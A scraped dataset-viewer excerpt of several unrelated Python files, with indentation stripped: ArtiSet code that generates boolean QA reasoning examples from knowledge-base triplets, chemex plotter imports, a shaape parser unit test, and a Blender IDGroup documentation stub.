# computing ID before ablations on the statement and rule tags:
for i, example in enumerate(examples):
m = hashlib.md5()
# note that the tags for ID creation are always the same!
for tag in [statement_tag] + rule_tags:
if tag in example:
if type(example[tag]) == list:
for e in example[tag]:
m.update(e['subject'].encode())
m.update(e['predicate'].encode())
m.update(e['object'].encode())
m.update(e['validity'].encode())
else:
m.update(example[tag]['subject'].encode())
m.update(example[tag]['predicate'].encode())
m.update(example[tag]['object'].encode())
m.update(example[tag]['validity'].encode())
example['id'] = m.hexdigest()
# Ablations
# now that all the examples are ready, we can ablate as needed:
random.seed(17)
for ablation in ablation_list:
if len(ablation) == 3:
fields, fraction, condition = ablation
examples_cands = [e for e in examples if e[condition[0]] in condition[1]]
else:
fields, fraction = ablation
examples_cands = examples
example_to_ablate = random.sample(examples_cands, int(fraction * float(len(examples))))
for e in example_to_ablate:
for field in fields:
if field in e:
del e[field]
# for every field we ablate we must ablate the same field from distractors!
if random.random() < ablate_same_distractor_fields:
for distractor_tag in distractor_tags:
if distractor_tag in e:
if field in e[distractor_tag]:
del e[distractor_tag][field]
random.seed(17)
for i, example in enumerate(examples):
context_rules = []
# adding actual rules
for rule_tag in rule_tags:
if rule_tag in example:
rules = example[rule_tag]
if not type(rules) == list:
rules = [rules]
for rule in rules:
reverse_validity = not rule['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(rule,
is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand, nlg_sampling=nlg_sampling))
# adding distractors
for rule_tag in distractor_tags:
if rule_tag in example:
for field, tag_distractors in example[rule_tag].items():
for rule in tag_distractors:
rule_list = rule
if not type(rule_list) == list:
rule_list = [rule_list]
for r in rule_list:
reverse_validity = not r['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(r, is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand,
nlg_sampling=nlg_sampling))
use_hypothetical_statement = False
if 'is_hypothetical_statement' in example and example['is_hypothetical_statement']:
use_hypothetical_statement = True
answer = 1 if example[statement_tag]['validity'] == 'always true' else 0
if self.variant != 'statement_subject_lang_selectivity':
if random.random() < reverse_validity_frac:
answer = 1 - answer
reverse_validity = True
else:
reverse_validity = False
phrase = TeachAIKB().to_pseudo_language(example[statement_tag], is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling, reverse_validity=reverse_validity)
else:
statement_dict = deepcopy(example[statement_tag])
statement_dict['subject'] = random.sample(['foo','blah','ya','qux','aranglopa','foltopia','cakophon','baz','garply'], 1)[0]
phrase = TeachAIKB().to_pseudo_language(statement_dict, is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling)
# creating a unique set of rules that does not include the statement.
context_rules = list(set(context_rules))
# set order is random!! so we need to fix the order the get a replicable order.
context_rules = sorted(context_rules)
random.shuffle(context_rules)
example.update({'phrase': phrase, \
'answer': answer,
'context': ' '.join(context_rules),
'split': split,
'rules': context_rules})
# append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
# (that must contain a "phrase", "answer") and converts it to a BooleanQA format
self.append_teachyourai_format_example(example, do_print=False)
self.examples_meta.append(deepcopy(example))
def print_examples(self, sample):
random.seed(7)
example_inds = random.sample(range(len(self.artiset_data)), sample)
## Printing a sample!
for ind in example_inds:
example = self.artiset_data[ind]
if 'statement' in example:
statement = example['statement']
rules = '\n'.join(example['rules'])
e = f"{example['id']}({example['split']}):\n{bc.BOLD}Q:{bc.ENDC}{example['phrase']} {bc.BOLD}A:{bc.ENDC}{example['answer']}\n{bc.BOLD}C:{bc.ENDC}{rules} "
e = e.replace(statement['object'], f"{bc.Blue}{statement['object']}{bc.ENDC}")
e = e.replace(statement['predicate'], f"{bc.Green}{statement['predicate']}{bc.ENDC}")
e = e.replace(str(statement['subject']), f"{bc.Magenta}{statement['subject']}{bc.ENDC}")
if 'hypernym' in example:
hypernym = example['hypernym']['object']
e = e.replace(str(hypernym), f"{bc.Cyan}{hypernym}{bc.ENDC}")
e = e.replace('not', f"{bc.Red}not{bc.ENDC}")
e = e.replace('type', f"{bc.Yellow}type{bc.ENDC}")
if 'num_of_instances' in example:
e = e.replace(' ' + num2words1[example['num_of_instances']].lower() + ' ' \
, f"{bc.Red} {num2words1[example['num_of_instances']].lower()} {bc.ENDC}")
for number in 'one', 'two', 'three', 'four', 'five':
e = e.replace(' ' + number + ' ', f"{bc.Cyan} {number} {bc.ENDC}")
else:
e = f"{example['id']}({example['split']}):\n{bc.BOLD}Q:{bc.ENDC}{example['phrase']} {bc.BOLD}A:{bc.ENDC}{example['answer']}\n{bc.BOLD}C:{bc.ENDC}{example['context']} "
print(e + '\n')
def create_subject_filter_lookup(self, examples, sample_on=None, avoid_mixing=None):
if sample_on is not None:
triplets_to_sample_on = [e[sample_on] for e in examples]
else:
triplets_to_sample_on = examples
# building subject filter lookup:
subject_filter_lookup = {}
rules_to_sample_df = pd.DataFrame(triplets_to_sample_on)
for curr_subject, matching_records in tqdm(rules_to_sample_df.groupby('subject')):
subject_to_filter = {curr_subject}
if avoid_mixing is not None and 'predicates' in avoid_mixing:
subject_to_filter |= set(
rules_to_sample_df[~rules_to_sample_df['predicate'].isin(set(matching_records['predicate']))]['subject'])
if avoid_mixing is not None and 'hyponyms' in avoid_mixing:
subject_to_filter |= {e['subject'] for e in TeachAIKB().sample({'predicate': 'hypernym', 'object': curr_subject})}
if avoid_mixing is not None and 'co-hyponyms' in avoid_mixing:
subject_is_hyponym_of = {e['object'] for e in TeachAIKB().sample({'subject': curr_subject, 'predicate': 'hypernym'})}
subject_to_filter |= {e['subject'] for e in
TeachAIKB().sample({'predicate': 'hypernym', 'object': list(subject_is_hyponym_of)})}
if avoid_mixing is not None and 'co-meronyms' in avoid_mixing:
subject_is_meronym_of = {e['subject'] for e in TeachAIKB().sample({'predicate': 'meronym', 'object': curr_subject})}
subject_to_filter |= {e['object'] for e in
TeachAIKB().sample({'predicate': 'meronym', 'subject': list(subject_is_meronym_of)})}
subject_filter_lookup[curr_subject] = subject_to_filter
return subject_filter_lookup
#@profile
def self_negative_subject_sample(self, examples, sample_on = None, avoid_mixing=None, over_sample = 1.0):
examples = deepcopy(examples)
if sample_on is not None:
triplets_to_sample_on = [e[sample_on] for e in examples]
else:
triplets_to_sample_on = examples
subject_filter_lookup = self.create_subject_filter_lookup(examples, sample_on, avoid_mixing)
output = []
examples_to_gen_from = deepcopy(examples) + random.sample(deepcopy(examples),int((over_sample - 1) * len(examples)))
for i,example in tqdm(enumerate(examples_to_gen_from)):
# sometimes we just want a list of triplets, with no specific dictionary field called "sample_on" ...
if sample_on is not None:
curr_triplet = example[sample_on]
else:
curr_triplet = example
curr_subject = curr_triplet['subject']
if sample_on is not None:
new_edge = deepcopy(
random.sample([e for e in examples if e[sample_on]['subject'] not in subject_filter_lookup[curr_subject]], 1)[0])
new_edge[sample_on]['predicate'] = deepcopy(curr_triplet['predicate'])
new_edge[sample_on]['object'] = deepcopy(curr_triplet['object'])
new_edge[sample_on]['validity'] = 'never true'
else:
new_edge = deepcopy(
random.sample([e for e in triplets_to_sample_on if e['subject'] not in subject_filter_lookup[curr_subject]], 1)[0])
new_edge['predicate'] = deepcopy(curr_triplet['predicate'])
new_edge['object'] = deepcopy(curr_triplet['object'])
new_edge['validity'] = 'never true'
output.append(new_edge)
return output
def connect_negative_shuffle_subject(self, shuffle, shuffle_on, tar_tag, avoid_mixing=None):
logger.info(f'connect_negative_shuffle_subject {tar_tag}')
# We assume shuffle_on is only one field (usueally predicate or object)
# Finding "clusters" that may not be shuffled internally when producing negative examples
# (because the have downword monotone relations)
connect_to = deepcopy(shuffle)
triplets_to_shuffle_df = pd.DataFrame(([e[shuffle_on] for e in shuffle]))
field_to_shuffle_counts = triplets_to_shuffle_df['subject'].value_counts()
subjects_to_shuffle = set(triplets_to_shuffle_df['subject'])
remaining_inds_to_choose = set(triplets_to_shuffle_df.index)
for curr_subject, size in field_to_shuffle_counts.iteritems():
potential_target_inds = deepcopy(remaining_inds_to_choose)
tar_subjects = subjects_to_shuffle - {curr_subject}
tar_subjects -= {e['subject'] for e in TeachAIKB().sample({'predicate': 'hypernym', 'object': curr_subject})}
if avoid_mixing is not None and 'co-hyponyms' in avoid_mixing:
subject_is_hyponym_of = {e['object'] for e in TeachAIKB().sample({'subject': curr_subject, 'predicate': 'hypernym'})}
tar_subjects -= {e['subject'] for e in
TeachAIKB().sample({'predicate': 'hypernym', 'object': list(subject_is_hyponym_of)})}
if avoid_mixing is not None and 'co-meronyms' in avoid_mixing:
subject_is_meronym_of = {e['subject'] for e in self.sample({'predicate': 'meronym', 'object': curr_subject})}
tar_subjects -= {e['object'] for e in self.sample({'predicate': 'meronym', 'subject': list(subject_is_meronym_of)})}
potential_target_inds &= set(triplets_to_shuffle_df[triplets_to_shuffle_df['subject'].isin(tar_subjects)].index)
targets = [e for e in connect_to if e[shuffle_on]['subject'] == curr_subject]
selected_inds = []
for i in random.sample(potential_target_inds, len(potential_target_inds)):
new_edge = {'subject': curr_subject,
'predicate': triplets_to_shuffle_df.loc[i, 'predicate'],
'object': triplets_to_shuffle_df.loc[i, 'object']}
# checking if there is no triplet that is true with the same values:
matching_edges_in_kb = self.lookup(new_edge)
if len(matching_edges_in_kb) == 0:
targets[len(selected_inds)][tar_tag] = new_edge
targets[len(selected_inds)][tar_tag].update({'validity': 'never true'})
selected_inds.append(i)
if len(selected_inds) >= len(targets):
break
if len(selected_inds) < len(targets):
logger.debug(f'did not find enough for {curr_subject}: {len(selected_inds)} found, {len(targets)} required')
else:
logger.debug(f'{curr_subject}: {len(selected_inds)} found.')
remaining_inds_to_choose -= set(selected_inds)
return connect_to
def sample_distractors(self, examples, sample, tar_tag):
# building indexes:
for i, sample_props in enumerate(sample):
src_tag, src_fields, sample, exactly_sample_num, connect, balance_with_statement = sample_props
# creating general indexes
indexes = {}
for field in ['subject', 'predicate', 'object', 'validity']:
indexes[field] = {}
for i, r in enumerate(examples):
if r[src_tag][field] not in indexes[field]:
indexes[field][r[src_tag][field]] = {i}
else:
indexes[field][r[src_tag][field]] |= {i}
# Link the connection to existing tags.
for i, example in tqdm(enumerate(examples), desc=f'adding distractors for {sample_props}'):
cand_inds_signed = {}
# the index helps us get candidates fast from the df of candidate_edges
cand_inds = set(range(len(examples)))
for field in src_fields:
cand_inds &= indexes[field][example[src_tag][field]]
# making sure cand edges do not contain a duplicate of the currect example
same_as_example_inds = indexes['subject'][example[src_tag]['subject']] & \
indexes['predicate'][example[src_tag]['predicate']] & \
indexes['object'][example[src_tag]['object']]
cand_inds -= same_as_example_inds
cand_inds_signed = {'always true':set(), 'never true': set()}
for validity in ['always true', 'never true']:
if validity in indexes['validity']:
cand_inds_signed[validity] |= cand_inds & indexes['validity'][validity]
if exactly_sample_num:
num_to_sample = sample
else:
num_to_sample = random.sample(range(min(len(cand_inds_signed['always true']) + \
len(cand_inds_signed['never true']), sample) + 1), 1)[0]
# Here we choose what is the validity value of the distractor we want to sample
if balance_with_statement is not None:
# balance_with_statement is not None, that means we care about the validity value balancing.
validities_to_sample = {'always true': math.ceil(num_to_sample / 2), 'never true': math.ceil(num_to_sample / 2)}
if balance_with_statement and validities_to_sample[example[src_tag]['validity']] > 0:
validities_to_sample[example[src_tag]['validity']] -= 1
else:
# Here we just randomly sample from a certain validity value (balance_with_statement is None, so it doesn't matter to us)
validities_to_sample = {'always true': 0, 'never true': 0}
validity_value_to_sample = random.sample(['always true', 'never true'],1)[0]
validities_to_sample[validity_value_to_sample] = num_to_sample
balanced_cand_inds = []
for validity, num_to_sample in validities_to_sample.items():
if len(cand_inds_signed[validity]) >= num_to_sample:
balanced_cand_inds += random.sample(cand_inds_signed[validity], num_to_sample)
# now actually sampling the rule we want to add to distractors
if tar_tag not in example:
example[tar_tag] = {}
for ind in balanced_cand_inds:
for tag in connect:
if tag not in example[tar_tag]:
example[tar_tag][tag] = []
example[tar_tag][tag].append(examples[ind][tag])
return examples
def print_stats(self):
for part in ['statement', 'implicit_rule', 'property']:
entities = {'dev': [], 'train': []}
for e in self.examples_meta:
if part in e:
if e['split'] == 'dev':
entities['dev'] += [e[part]['subject'], e[part]['object']]
elif e['split'] == 'train':
entities['train'] += [e[part]['subject'], e[part]['object']]
if len(entities['dev']) == 0 | len(entities['train']) == 0:
logger.info(f" {part} was not found or ablated.")
continue
entities_intersection_ratio = len(set(entities['dev']) & set(entities['train'])) / \
len(set(entities['dev']) | set(entities['train']))
logger.info(f"Dev/Train entity intersection in {part} :\n{entities_intersection_ratio}\n")
if entities_intersection_ratio > 0.01:
entity_stats = pd.DataFrame(
{'dev': pd.Series(entities['dev']).value_counts(), 'train': pd.Series(entities['train']).value_counts()}).dropna()
entity_stats['min'] = entity_stats[['dev', 'train']].min(axis=1)
logger.info(f"mutual entities stats:\n{entity_stats.sort_values(by='min')}")
if 'statement' in self.examples_meta[0]:
agg = pandas_multi_column_agg(pd.DataFrame([{'predicate': e['statement']['predicate'],'split':e['split'], 'z': 1} \
for e in self.examples_meta]), ['split', 'predicate'])
logger.info(f"Predicate count per split:\n{agg}\n")
examples_meta_df = pd.DataFrame(self.examples_meta)
logger.info(f"Positive vs Negative:\n{pandas_multi_column_agg(examples_meta_df, ['split', 'answer'])}\n")
|
57376
|
from chemex.plotters.cest import CestPlotter as CestPlotter
from chemex.plotters.cpmg import CpmgPlotter as CpmgPlotter
from chemex.plotters.plotter import Plotter as Plotter
from chemex.plotters.relaxation import RelaxationPlotter as RelaxationPlotter
from chemex.plotters.shift import ShiftPlotter as ShiftPlotter
|
57379
|
from shaape.parser import Parser
import nose
import unittest
from nose.tools import *
class TestParser(unittest.TestCase):
def test_init(self):
parser = Parser()
assert parser != None
assert parser.parsed_data() == []
assert parser.drawable_objects() == []
def test_run(self):
parser = Parser()
assert_raises(NotImplementedError, parser.run, "", [])
|
57392
|
class IDGroup:
"""
The IDGroup Type
================
This type supports both iteration and the []
operator to get child ID properties.
You can also add new properties using the [] operator.
For example::
group['a float!'] = 0.0
group['an int!'] = 0
group['a string!'] = "hi!"
group['an array!'] = [0, 0, 1.0, 0]
group['a subgroup!] = {"float": 0.0, "an int": 1.0, "an array": [1, 2],
"another subgroup": {"a": 0.0, "str": "bleh"}}
Note that for arrays, the array type defaults to int unless a float is found
while scanning the template list; if any floats are found, then the whole
array is float. Note that double-precision floating point numbers are used for
python-created float ID properties and arrays (though the internal C api does
support single-precision floats, and the python code will read them).
You can also delete properties with the del operator. For example:
del group['property']
To get the type of a property, use the type() operator, for example::
if type(group['bleh']) == str: pass
To tell if the property is a group or array type, import the Blender.Types module and test
against IDGroupType and IDArrayType, like so::
from Blender.Types import IDGroupType, IDArrayType.
if type(group['bleghr']) == IDGroupType:
(do something)
@ivar name: The name of the property
@type name: string
"""
def pop(item):
"""
Pop an item from the group property.
@type item: string
@param item: The item name.
@rtype: can be dict, list, int, float or string.
@return: The removed property.
"""
def update(updatedict):
"""
Updates items in the dict, similar to normal python
dictionary method .update().
@type updatedict: dict
@param updatedict: A dict of simple types to derive updated/new IDProperties from.
@rtype: None
@return: None
"""
def keys():
"""
Returns a list of the keys in this property group.
@rtype: list of strings.
@return: a list of the keys in this property group.
"""
def values():
"""
Returns a list of the values in this property group.
Note that unless a value is itself a property group or an array, you
cannot change it by changing the values in this list, you must change them
in the parent property group.
For example,
group['some_property'] = new_value
. . .is correct, while,
values = group.values()
values[0] = new_value
. . .is wrong.
@rtype: list of strings.
@return: a list of the values in this property group.
"""
def iteritems():
"""
Implements the python dictionary iteritmes method.
For example::
for k, v in group.iteritems():
print "Property name: " + k
print "Property value: " + str(v)
@rtype: an iterator that spits out items of the form [key, value]
@return: an iterator.
"""
def convert_to_pyobject():
"""
Converts the entire property group to a purely python form.
@rtype: dict
@return: A python dictionary representing the property group
"""
class IDArray:
"""
The IDArray Type
================
@ivar type: returns the type of the array, can be either IDP_Int or IDP_Float
"""
def __getitem__(index):
pass
def __setitem__(index, value):
pass
def __len__():
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.